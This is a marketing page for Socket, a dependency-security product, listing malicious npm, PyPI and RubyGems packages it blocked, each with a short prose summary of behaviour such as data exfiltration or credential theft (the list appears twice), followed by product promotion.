You're Invited:Meet the Socket Team at BlackHat and DEF CON in Las Vegas, Aug 4-6.RSVP
Socket
Book a DemoInstallSign in
Socket

Secure your dependencies. Ship with confidence.

Socket is a developer-first security platform that protects your code from both vulnerable and malicious dependencies.

Install GitHub AppBook a Demo

Find and compare millions of open source packages

Quickly evaluate the security and health of any open source package.

jquery
t

timmywil published 3.7.1

left-pad
s

stevemao published 1.3.0

react
r

react-bot published 19.1.0

We protect you from vulnerable and malicious packages

shaiduwkv

912.6

Removed from PyPI

Blocked by Socket

The code poses a significant security risk by sending sensitive system information to suspicious external domains. This behavior is consistent with data exfiltration attempts, and the use of unknown URLs suggests potential malicious intent.

Live on PyPI for 3 hours and 30 minutes before removal. Socket users were protected even while the package was live.

abu-news-api

1.0.0

Removed from npm

Blocked by Socket

The code appears to be collecting sensitive system and environment information and is designed to send this data to a remote server. This behavior is indicative of a data exfiltration attempt, which can be considered malicious depending on the context in which this script is used. However, due to incomplete and malformed request execution code, as presented, the script would not successfully send data as intended.

Live on npm for 6 minutes before removal. Socket users were protected even while the package was live.

discord.js-hex

1.0.0

by xignoticdev

Removed from npm

Blocked by Socket

Given the obfuscation, use of critical node modules, and patterns consistent with malicious scripts such as dynamic execution of code, the script is likely intended to perform unauthorized actions on the system. This includes data manipulation, executing commands, or acting as a backdoor.

Live on npm for 1 day and 37 minutes before removal. Socket users were protected even while the package was live.

akita-poc

1.2.5

by pepolanza

Removed from npm

Blocked by Socket

The script sends the hostname of the machine to a remote server, which poses a significant security risk and indicates malicious behavior.

Live on npm for 1 minute before removal. Socket users were protected even while the package was live.

hydroscript

0.0.2-1.real

by hyperknf

Removed from npm

Blocked by Socket

The code potentially allows execution of arbitrary JavaScript code by manipulating the 'time' input to point to a malicious script. The lack of validation or sanitization of the input combined with the execution rights raises security concerns.

Live on npm for 5 days, 21 hours and 40 minutes before removal. Socket users were protected even while the package was live.

glup-debugger-log

0.0.2

by wzh0505

Removed from npm

Blocked by Socket

The code exhibits potentially malicious behavior with dynamic command execution and file operations that could lead to system compromise. Caution is advised when dealing with this code as it poses a high security risk.

Live on npm for 29 minutes before removal. Socket users were protected even while the package was live.

bfx-svc-integration

99.10.10

Removed from npm

Blocked by Socket

The code engages in potentially malicious behavior by collecting sensitive system information and sending it to a remote server without clear user consent. The hard-coded domain, data obfuscation, and lack of transparency raise significant privacy and security concerns. The risk score is high due to the invasive nature of the code.

Live on npm for 18 minutes before removal. Socket users were protected even while the package was live.

minecraft-coins-free975

1.0.2

by sicrap

Removed from npm

Blocked by Socket

The code exhibits potentially malicious behavior such as unauthorized login attempts and content publishing, as well as obfuscation and hard-coded credentials. The overall security risk is high due to the presence of these factors.

Live on npm for 57 minutes before removal. Socket users were protected even while the package was live.

vite-plugin-svg-paths

1.1.7

by sammd

Live on npm

Blocked by Socket

The code contains a severe security vulnerability due to the use of eval() on remotely fetched data, enabling remote code execution. This represents a critical supply chain security risk. The unknown domain contacted and suspicious headers increase suspicion. The code should not be used in production or trusted environments without significant revision. Malware risk is high due to arbitrary code execution potential.

lotus-symphony-dle682

1.0.0

by afifaljafari112

Removed from npm

Blocked by Socket

The code contains unusual naming conventions and method calls that do not align with standard practices. Without the actual content of the imported modules, it's challenging to determine the exact behavior or intent of the code. The naming and structure raise suspicion but do not definitively indicate malicious intent. There is no evidence of data leakage or clear security risks within the provided code itself. However, the lack of clarity and unusual patterns suggest that a more in-depth review of the imported modules is necessary to rule out potential threats.

Live on npm for 57 days and 54 minutes before removal. Socket users were protected even while the package was live.

ac-base

0.26.999

Removed from npm

Blocked by Socket

The code exhibits malicious behavior by collecting and exfiltrating system information using DNS queries. The heavy obfuscation further suggests an intent to hide these actions. This poses a significant security risk.

Live on npm for 59 minutes before removal. Socket users were protected even while the package was live.

relativity123rf

5.98.99

by nevadatan46

Removed from npm

Blocked by Socket

The code is malicious. It collects sensitive system information (hostname, current user, current working directory, and directory listing) without consent, encodes this information in base64 to obfuscate it, and sends it to an external server. This behavior is characteristic of a malware payload designed for data exfiltration.

Live on npm for 26 minutes before removal. Socket users were protected even while the package was live.

pwn

0.5.316

by 0day Inc.

Live on Rubygems

Blocked by Socket

The script 'packer/provisioners/post_install.sh' exhibits malicious behavior by performing several harmful actions: - **Deletes user and root history files**: Uses secure deletion methods to remove history files, potentially to conceal malicious activities. - **Clears system log files**: Erases log files from '/var/log', hindering the ability to audit and investigate system actions. - **Disables the root account**: Locks the root account password without ensuring alternative secure administrative access, possibly preventing legitimate administrative operations. - **Sets a weak default password ('changeme') for the 'admin' user**: Introduces a significant security risk by using an easily guessable password, facilitating unauthorized access. These actions can be exploited by an attacker to gain unauthorized access, disrupt legitimate operations, and prevent system recovery. The combination of log and history deletion, disabling of root access, and setting weak credentials indicates malicious intent to compromise system security and conceal nefarious activities.

01node_worm

1.0.0

by coder_jqy

Removed from npm

Blocked by Socket

The code is designed to fetch and process JSONP data from a remote API. It contains a serious security flaw by using eval() on untrusted network data, which can lead to remote code execution vulnerabilities. There is no direct evidence of malware or obfuscation, but the security risk is high due to unsafe eval usage. The reports provided are invalid and uninformative. It is recommended to avoid eval and use safer JSONP parsing or standard JSON parsing methods. Hardcoded cookies and headers should be handled carefully to avoid leaking sensitive information.

Live on npm for 4 hours and 26 minutes before removal. Socket users were protected even while the package was live.

mre-config-react

2.0.8

by higoarm

Removed from npm

Blocked by Socket

The code snippet transmits the local machine's hostname to an external, suspicious ngrok.io domain without user consent, silently ignoring errors and response. This constitutes a privacy violation and potential data exfiltration, which is suspicious and may be malicious depending on context. There is no obfuscation or complex code, but the use of a dynamic external endpoint and silent error handling increases the security risk. Overall, this code should be treated as potentially malicious or at least privacy-invasive.

Live on npm for 1 hour and 38 minutes before removal. Socket users were protected even while the package was live.

imad213

1.1.1

Removed from PyPI

Blocked by Socket

This Python-based credential harvester masquerades as an Instagram growth tool while implementing multiple layers of deception. The malware uses base64 encoding to conceal its code and checks a remote Netlify-hosted file for authorization before executing. Upon running, it prompts users for Instagram credentials under the pretense of providing follower growth services, stores these credentials in plaintext locally, and then broadcasts the username and password to ten different Turkish bot service websites. Each of these third-party services receives full access to the victim's Instagram account, enabling them to read private messages, post content, harvest follower data, or sell the credentials on underground markets. The tool violates Instagram's Terms of Service through automated bot activity while simultaneously compromising account security, potentially resulting in account suspension, identity theft, or complete account takeover.

Live on PyPI for 1 hour and 4 minutes before removal. Socket users were protected even while the package was live.

textvqa

99.10.9

by ujj6dg4z

Removed from npm

Blocked by Socket

The code is designed to collect and send sensitive information to a remote server without the user's knowledge or consent. It poses a high risk of data exfiltration and should be reviewed thoroughly.

Live on npm for 2 hours and 52 minutes before removal. Socket users were protected even while the package was live.

jupphelp

0.1.0

Removed from PyPI

Blocked by Socket

The code poses a significant security risk by downloading and executing a file from an external source without verification. This could lead to arbitrary code execution if the URL is compromised. The use of silent exception handling further obscures potential errors.

Live on PyPI for 5 minutes before removal. Socket users were protected even while the package was live.

@openapi-platform/git-util

9.9.10

by nodeeee123

Live on npm

Blocked by Socket

The source code exhibits highly suspicious and malicious behavior by exfiltrating sensitive system and package information to an untrusted external server without user consent. This represents a serious security risk and privacy violation. The code is not obfuscated but is clearly designed to steal data stealthily. It should be considered malicious and avoided.

@chegg/wtai-upload-widget

9.999.2

by frankoiuuu

Live on npm

Blocked by Socket

The code is designed to exfiltrate system information to an external server, which is a clear security risk and potentially malicious behavior.

posctss-value-parser

4.2.0

by nsrvmzuq

Removed from npm

Blocked by Socket

The code is dangerous and should not be used. The file downloaded from the external source should be verified and validated before being executed, and errors and exceptions should be handled properly.

Live on npm for 6 minutes before removal. Socket users were protected even while the package was live.

airbnb-dev

6.8.0

by jpdtest1

Removed from npm

Blocked by Socket

The code is designed to collect and transmit system information to external endpoints without user consent, which is indicative of malicious behavior. The hardcoded endpoints and the nature of the data being sent pose a significant security risk.

Live on npm for 23 hours and 28 minutes before removal. Socket users were protected even while the package was live.

qumra-ui

0.0.75

by abdalstar

Live on npm

Blocked by Socket

The package contains a hidden payload that targets Russian language users visiting Russian and Belarusian sites. For those users, it will disable user interaction and play a looping audio of the Ukrainian anthem after 3 days. Therefore, it is marked as malware only because it freezes interactions for many users. This behavior is not disclosed in any documentation of the package and seriously disrupts user experience.

bender-event-definition-loader

8.989.1

by hbsp0t

Removed from npm

Blocked by Socket

The source code contains a serious security issue where environment variables are sent to a remote server without user consent. This is a clear indication of data exfiltration and poses a high security risk.

Live on npm for 8 minutes before removal. Socket users were protected even while the package was live.

azure-graphrbac

13.26.1000

Removed from npm

Blocked by Socket

Possible typosquat of [azure](https://socket.dev/npm/package/azure) Explanation: The package 'azure-graphrbac' is labeled as a 'security holding package', which often indicates a placeholder to prevent typosquatting. The name 'azure-graphrbac' closely resembles 'azure' and could be misleading. The maintainers list includes 'npm', which is not a specific known maintainer. The description does not provide enough information to determine a distinct purpose, and the similarity in naming suggests it could be a typosquat. azure-graphrbac is a security-holding package

Live on npm for 3 hours and 1 minute before removal. Socket users were protected even while the package was live.

shaiduwkv

912.6

Removed from PyPI

Blocked by Socket

The code poses a significant security risk by sending sensitive system information to suspicious external domains. This behavior is consistent with data exfiltration attempts, and the use of unknown URLs suggests potential malicious intent.

Live on PyPI for 3 hours and 30 minutes before removal. Socket users were protected even while the package was live.

abu-news-api

1.0.0

Removed from npm

Blocked by Socket

The code appears to be collecting sensitive system and environment information and is designed to send this data to a remote server. This behavior is indicative of a data exfiltration attempt, which can be considered malicious depending on the context in which this script is used. However, due to incomplete and malformed request execution code, as presented, the script would not successfully send data as intended.

Live on npm for 6 minutes before removal. Socket users were protected even while the package was live.

discord.js-hex

1.0.0

by xignoticdev

Removed from npm

Blocked by Socket

Given the obfuscation, use of critical node modules, and patterns consistent with malicious scripts such as dynamic execution of code, the script is likely intended to perform unauthorized actions on the system. This includes data manipulation, executing commands, or acting as a backdoor.

Live on npm for 1 day and 37 minutes before removal. Socket users were protected even while the package was live.

akita-poc

1.2.5

by pepolanza

Removed from npm

Blocked by Socket

The script sends the hostname of the machine to a remote server, which poses a significant security risk and indicates malicious behavior.

Live on npm for 1 minute before removal. Socket users were protected even while the package was live.

hydroscript

0.0.2-1.real

by hyperknf

Removed from npm

Blocked by Socket

The code potentially allows execution of arbitrary JavaScript code by manipulating the 'time' input to point to a malicious script. The lack of validation or sanitization of the input combined with the execution rights raises security concerns.

Live on npm for 5 days, 21 hours and 40 minutes before removal. Socket users were protected even while the package was live.

glup-debugger-log

0.0.2

by wzh0505

Removed from npm

Blocked by Socket

The code exhibits potentially malicious behavior with dynamic command execution and file operations that could lead to system compromise. Caution is advised when dealing with this code as it poses a high security risk.

Live on npm for 29 minutes before removal. Socket users were protected even while the package was live.

bfx-svc-integration

99.10.10

Removed from npm

Blocked by Socket

The code engages in potentially malicious behavior by collecting sensitive system information and sending it to a remote server without clear user consent. The hard-coded domain, data obfuscation, and lack of transparency raise significant privacy and security concerns. The risk score is high due to the invasive nature of the code.

Live on npm for 18 minutes before removal. Socket users were protected even while the package was live.

minecraft-coins-free975

1.0.2

by sicrap

Removed from npm

Blocked by Socket

The code exhibits potentially malicious behavior such as unauthorized login attempts and content publishing, as well as obfuscation and hard-coded credentials. The overall security risk is high due to the presence of these factors.

Live on npm for 57 minutes before removal. Socket users were protected even while the package was live.

vite-plugin-svg-paths

1.1.7

by sammd

Live on npm

Blocked by Socket

The code contains a severe security vulnerability due to the use of eval() on remotely fetched data, enabling remote code execution. This represents a critical supply chain security risk. The unknown domain contacted and suspicious headers increase suspicion. The code should not be used in production or trusted environments without significant revision. Malware risk is high due to arbitrary code execution potential.

lotus-symphony-dle682

1.0.0

by afifaljafari112

Removed from npm

Blocked by Socket

The code contains unusual naming conventions and method calls that do not align with standard practices. Without the actual content of the imported modules, it's challenging to determine the exact behavior or intent of the code. The naming and structure raise suspicion but do not definitively indicate malicious intent. There is no evidence of data leakage or clear security risks within the provided code itself. However, the lack of clarity and unusual patterns suggest that a more in-depth review of the imported modules is necessary to rule out potential threats.

Live on npm for 57 days and 54 minutes before removal. Socket users were protected even while the package was live.

ac-base

0.26.999

Removed from npm

Blocked by Socket

The code exhibits malicious behavior by collecting and exfiltrating system information using DNS queries. The heavy obfuscation further suggests an intent to hide these actions. This poses a significant security risk.

Live on npm for 59 minutes before removal. Socket users were protected even while the package was live.

relativity123rf

5.98.99

by nevadatan46

Removed from npm

Blocked by Socket

The code is malicious. It collects sensitive system information (hostname, current user, current working directory, and directory listing) without consent, encodes this information in base64 to obfuscate it, and sends it to an external server. This behavior is characteristic of a malware payload designed for data exfiltration.

Live on npm for 26 minutes before removal. Socket users were protected even while the package was live.

pwn

0.5.316

by 0day Inc.

Live on Rubygems

Blocked by Socket

The script 'packer/provisioners/post_install.sh' exhibits malicious behavior by performing several harmful actions: - **Deletes user and root history files**: Uses secure deletion methods to remove history files, potentially to conceal malicious activities. - **Clears system log files**: Erases log files from '/var/log', hindering the ability to audit and investigate system actions. - **Disables the root account**: Locks the root account password without ensuring alternative secure administrative access, possibly preventing legitimate administrative operations. - **Sets a weak default password ('changeme') for the 'admin' user**: Introduces a significant security risk by using an easily guessable password, facilitating unauthorized access. These actions can be exploited by an attacker to gain unauthorized access, disrupt legitimate operations, and prevent system recovery. The combination of log and history deletion, disabling of root access, and setting weak credentials indicates malicious intent to compromise system security and conceal nefarious activities.

01node_worm

1.0.0

by coder_jqy

Removed from npm

Blocked by Socket

The code is designed to fetch and process JSONP data from a remote API. It contains a serious security flaw by using eval() on untrusted network data, which can lead to remote code execution vulnerabilities. There is no direct evidence of malware or obfuscation, but the security risk is high due to unsafe eval usage. The reports provided are invalid and uninformative. It is recommended to avoid eval and use safer JSONP parsing or standard JSON parsing methods. Hardcoded cookies and headers should be handled carefully to avoid leaking sensitive information.

Live on npm for 4 hours and 26 minutes before removal. Socket users were protected even while the package was live.

mre-config-react

2.0.8

by higoarm

Removed from npm

Blocked by Socket

The code snippet transmits the local machine's hostname to an external, suspicious ngrok.io domain without user consent, silently ignoring errors and response. This constitutes a privacy violation and potential data exfiltration, which is suspicious and may be malicious depending on context. There is no obfuscation or complex code, but the use of a dynamic external endpoint and silent error handling increases the security risk. Overall, this code should be treated as potentially malicious or at least privacy-invasive.

Live on npm for 1 hour and 38 minutes before removal. Socket users were protected even while the package was live.

imad213

1.1.1

Removed from PyPI

Blocked by Socket

This Python-based credential harvester masquerades as an Instagram growth tool while implementing multiple layers of deception. The malware uses base64 encoding to conceal its code and checks a remote Netlify-hosted file for authorization before executing. Upon running, it prompts users for Instagram credentials under the pretense of providing follower growth services, stores these credentials in plaintext locally, and then broadcasts the username and password to ten different Turkish bot service websites. Each of these third-party services receives full access to the victim's Instagram account, enabling them to read private messages, post content, harvest follower data, or sell the credentials on underground markets. The tool violates Instagram's Terms of Service through automated bot activity while simultaneously compromising account security, potentially resulting in account suspension, identity theft, or complete account takeover.

Live on PyPI for 1 hour and 4 minutes before removal. Socket users were protected even while the package was live.

textvqa

99.10.9

by ujj6dg4z

Removed from npm

Blocked by Socket

The code is designed to collect and send sensitive information to a remote server without the user's knowledge or consent. It poses a high risk of data exfiltration and should be reviewed thoroughly.

Live on npm for 2 hours and 52 minutes before removal. Socket users were protected even while the package was live.

jupphelp

0.1.0

Removed from PyPI

Blocked by Socket

The code poses a significant security risk by downloading and executing a file from an external source without verification. This could lead to arbitrary code execution if the URL is compromised. The use of silent exception handling further obscures potential errors.

Live on PyPI for 5 minutes before removal. Socket users were protected even while the package was live.

@openapi-platform/git-util

9.9.10

by nodeeee123

Live on npm

Blocked by Socket

The source code exhibits highly suspicious and malicious behavior by exfiltrating sensitive system and package information to an untrusted external server without user consent. This represents a serious security risk and privacy violation. The code is not obfuscated but is clearly designed to steal data stealthily. It should be considered malicious and avoided.

@chegg/wtai-upload-widget

9.999.2

by frankoiuuu

Live on npm

Blocked by Socket

The code is designed to exfiltrate system information to an external server, which is a clear security risk and potentially malicious behavior.

posctss-value-parser

4.2.0

by nsrvmzuq

Removed from npm

Blocked by Socket

The code is dangerous and should not be used. The file downloaded from the external source should be verified and validated before being executed, and errors and exceptions should be handled properly.

Live on npm for 6 minutes before removal. Socket users were protected even while the package was live.

airbnb-dev

6.8.0

by jpdtest1

Removed from npm

Blocked by Socket

The code is designed to collect and transmit system information to external endpoints without user consent, which is indicative of malicious behavior. The hardcoded endpoints and the nature of the data being sent pose a significant security risk.

Live on npm for 23 hours and 28 minutes before removal. Socket users were protected even while the package was live.

qumra-ui

0.0.75

by abdalstar

Live on npm

Blocked by Socket

The package contains a hidden payload that targets Russian language users visiting Russian and Belarusian sites. For those users, it will disable user interaction and play a looping audio of the Ukrainian anthem after 3 days. Therefore, it is marked as malware only because it freezes interactions for many users. This behavior is not disclosed in any documentation of the package and seriously disrupts user experience.

bender-event-definition-loader

8.989.1

by hbsp0t

Removed from npm

Blocked by Socket

The source code contains a serious security issue where environment variables are sent to a remote server without user consent. This is a clear indication of data exfiltration and poses a high security risk.

Live on npm for 8 minutes before removal. Socket users were protected even while the package was live.

azure-graphrbac

13.26.1000

Removed from npm

Blocked by Socket

Possible typosquat of [azure](https://socket.dev/npm/package/azure) Explanation: The package 'azure-graphrbac' is labeled as a 'security holding package', which often indicates a placeholder to prevent typosquatting. The name 'azure-graphrbac' closely resembles 'azure' and could be misleading. The maintainers list includes 'npm', which is not a specific known maintainer. The description does not provide enough information to determine a distinct purpose, and the similarity in naming suggests it could be a typosquat. azure-graphrbac is a security-holding package

Live on npm for 3 hours and 1 minute before removal. Socket users were protected even while the package was live.

Detect and block software supply chain attacks

Socket detects traditional vulnerabilities (CVEs) but goes beyond that to scan the actual code of dependencies for malicious behavior. It proactively detects and blocks 70+ signals of supply chain risk in open source code, for comprehensive protection.

Known malware

Possible typosquat attack

Chrome Extension Permission

Chrome Extension Wildcard Host Permission

NPM Shrinkwrap

Git dependency

HTTP dependency

Suspicious Stars on GitHub

Protestware or potentially unwanted behavior

Unstable ownership

25 more alerts

Detect suspicious package updates in real-time

Socket detects and blocks malicious dependencies, often within just minutes of them being published to public registries, making it the most effective tool for blocking zero-day supply chain attacks.

GitHub app screenshot

Developers love Socket

Socket is built by a team of prolific open source maintainers whose software is downloaded over 1 billion times per month. We understand how to build tools that developers love. But don’t take our word for it.

Even more developer love
Install GitHub AppRead the docs

Security teams trust Socket

The best security teams in the world use Socket to get visibility into supply chain risk, and to build a security feedback loop into the development process.

Even more security team love
Book a DemoRead the blog

Why teams choose Socket

Pro-active security

Depend on Socket to prevent malicious open source dependencies from infiltrating your app.

Easy to install

Install the Socket GitHub App in just 2 clicks and get protected today.

Comprehensive open source protection

Block 70+ issues in open source code, including malware, typo-squatting, hidden code, misleading packages, permission creep, and more.

Develop faster

Reduce work by surfacing actionable security information directly in GitHub. Empower developers to make better decisions.

Supply chain attacks are on the rise

Attackers have taken notice of the opportunity to attack organizations through open source dependencies. Supply chain attacks rose a whopping 700% in the past year, with over 15,000 recorded attacks.

Dec 14, 2023

Hijacked cryptocurrency library adds malware

Widely-used library in cryptocurrency frontend was compromised to include wallet-draining code, following the hijacking of NPM account credentials via phishing.

Jan 06, 2022

Maintainer intentionally adds malware

Rogue maintainer sabotages his own open source package with 100M downloads/month, notably breaking Amazon's AWS SDK.

Nov 15, 2021

npm discovers a platform vulnerability allowing unauthorized publishing of any package

Attackers could publish new versions of any npm package without authorization for multiple years.

Oct 22, 2021

Hijacked package adds cryptominers and password-stealing malware

Multiple packages with 30M downloads/month are hijacked and publish malicious versions directly into the software supply chain.

Nov 26, 2018

Package hijacked adding organization specific backdoors

Obfuscated malware added to a dependency which targeted a single company, went undetected for over a week, and made it into their production build.

Ready to dive in?

Get protected by Socket with just 2 clicks.

Install GitHub AppBook a Demo

The latest from the Socket team

Get our latest security research, open source insights, and product updates.

View all articles